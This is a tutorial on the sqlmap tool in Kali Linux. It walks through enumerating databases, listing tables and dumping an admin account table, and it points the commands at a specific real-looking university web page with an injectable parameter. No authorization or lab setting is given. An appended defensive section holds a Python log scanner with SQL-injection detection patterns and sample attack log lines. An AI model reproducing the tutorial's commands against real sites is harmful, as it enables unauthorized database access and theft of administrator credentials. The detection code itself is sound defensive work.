How to use the sqlmap tool in Kali Linux



Do you know the sqlmap tool in Kali Linux?
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Put simply, sqlmap can be used to find a website's admin password.

Preparation
- Connection

To start, follow these instructions.
Open a terminal and start sqlmap.

sqlmap
sqlmap -u (sites target) --dbs
Replace (sites target) with the URL of the website that contains the vulnerability.
For example:
sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 --dbs
After finding the databases, select one of them to list its tables:
sqlmap -u (sites target) -D (database) --tables
Replace (database) with the database you selected.
For example:
sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 -D unsbersih --tables
After finding the tables, choose the admin account table:
sqlmap -u (sites target) -D (database) -T (admin_account) --dump
For example:
sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 -D unsbersih -T admin --dump
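
From the defender's side, runs like the three above leave recognisable traces in the web server's access log. The sketch below is an added example, not part of the original post: it assumes the Apache/Nginx combined log format, and the log lines, the /artikel.php path and the format rule for `nim` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# SQL fragments that have no business inside a student-number parameter.
SQLI_RE = re.compile(
    r"union\s+(all\s+)?select|information_schema|\bsleep\s*\(|\bor\s+\d+\s*=\s*\d+|--\s|/\*",
    re.IGNORECASE,
)
# Assumption: a legitimate `nim` value is a short alphanumeric ID like the one on the page.
NIM_RE = re.compile(r"^[A-Za-z0-9]{1,16}$")

# Constructed sample log lines (documentation IP ranges, made-up sizes and times).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2015:13:55:36 +0700] "GET /artikel.php?nim=I0114012 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Oct/2015:13:56:01 +0700] "GET /artikel.php?nim=I0114012%27%20UNION'
    '%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 4980 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '198.51.100.7 - - [10/Oct/2015:13:56:09 +0700] "GET /artikel.php?nim=I0114012%27 HTTP/1.1" '
    '500 312 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return the reasons (possibly none) a request looks like automated SQLi probing."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    reasons = []
    # The User-Agent is client-controlled, so it is a hint, never the only check.
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    # parse_qsl percent-decodes values, so encoded payloads are matched in clear form.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if SQLI_RE.search(value):
            reasons.append(f"sql-keywords:{name}")
        elif name == "nim" and not NIM_RE.match(value):
            reasons.append(f"bad-format:{name}")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every suspicious line, numbering from 1."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, start=1)]
    return [(n, reasons) for n, reasons in hits if reasons]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(lineno, ", ".join(reasons))
```

Log matching only shows that probing happened; the underlying fix is for the page to pass `nim` to the database as a bound parameter instead of concatenating it into the query.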